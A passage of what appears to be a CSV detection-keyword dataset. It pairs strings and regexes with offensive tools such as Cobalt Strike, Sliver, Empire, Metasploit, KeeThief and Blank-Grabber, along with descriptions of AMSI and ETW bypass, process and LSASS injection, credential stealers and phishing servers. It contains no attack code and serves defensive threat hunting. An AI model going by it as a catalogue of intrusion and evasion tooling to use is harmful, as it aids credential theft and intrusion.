- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","48509" "*inject-amsiBypass *",".{0,1000}inject\-amsiBypass\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","48510" 
"*inject-amsi-bypass*",".{0,1000}inject\-amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48511" "*inject-amsiBypass.*",".{0,1000}inject\-amsiBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","48512" "*InjectApp.InfectClickonceApp(*",".{0,1000}InjectApp\.InfectClickonceApp\(.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","48513" "*inject-assembly *",".{0,1000}inject\-assembly\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48514" "*inject-assembly.cna*",".{0,1000}inject\-assembly\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48515" "*injectassembly.x64.bin*",".{0,1000}injectassembly\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48516" "*injectassembly.x64.o*",".{0,1000}injectassembly\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into 
an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","48517" "*Inject-BypassStuff *",".{0,1000}Inject\-BypassStuff\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - 
T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48518" "*Inject-BypassStuff*",".{0,1000}Inject\-BypassStuff.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48519" "*InjectDll RTVideo.dll*",".{0,1000}InjectDll\sRTVideo\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","48520" "*InjectDll.cpp*",".{0,1000}InjectDll\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48521" "*InjectDll.vcxproj*",".{0,1000}InjectDll\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48522" "*injected into LSASS*",".{0,1000}injected\sinto\sLSASS.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","New-HoneyHash.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48523" "*Injected Word document has been saved!*",".{0,1000}Injected\sWord\sdocument\shas\sbeen\ssaved!.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. 
Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#content","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","48524" "*Injected! Check your listener!*",".{0,1000}Injected!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","48525" "*InjectedCredentials.csv*",".{0,1000}InjectedCredentials\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","48526" "*injectEtwBypass*",".{0,1000}injectEtwBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","N/A","10","10","279","55","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z","48527" "*inject-etw-bypass*",".{0,1000}inject\-etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48528" "*injectify*",".{0,1000}injectify.{0,1000}","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & 
Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","N/A","7","674","119","2024-03-25T09:04:38Z","2017-11-06T17:01:50Z","48529" "*Injecting backdoor into discord*",".{0,1000}Injecting\sbackdoor\sinto\sdiscord.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","48530" "*Injecting converted DLL shellcode into remote process*",".{0,1000}Injecting\sconverted\sDLL\sshellcode\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48531" "*Injecting into mstsc.exe*",".{0,1000}Injecting\sinto\smstsc\.exe.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","48532" "*Injecting NetRipper into process with ID *",".{0,1000}Injecting\sNetRipper\sinto\sprocess\swith\sID\s.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","48533" "*Injecting Reflective DLL into remote 
process*",".{0,1000}Injecting\sReflective\sDLL\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48534" "*Injecting shellcode into PID: *",".{0,1000}Injecting\sshellcode\sinto\sPID\:\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","48535" "*Injecting shellcode into PID: *",".{0,1000}Injecting\sshellcode\sinto\sPID\:\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","48536" "*Injecting shellcode into PowerShell*",".{0,1000}Injecting\sshellcode\sinto\sPowerShell.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 
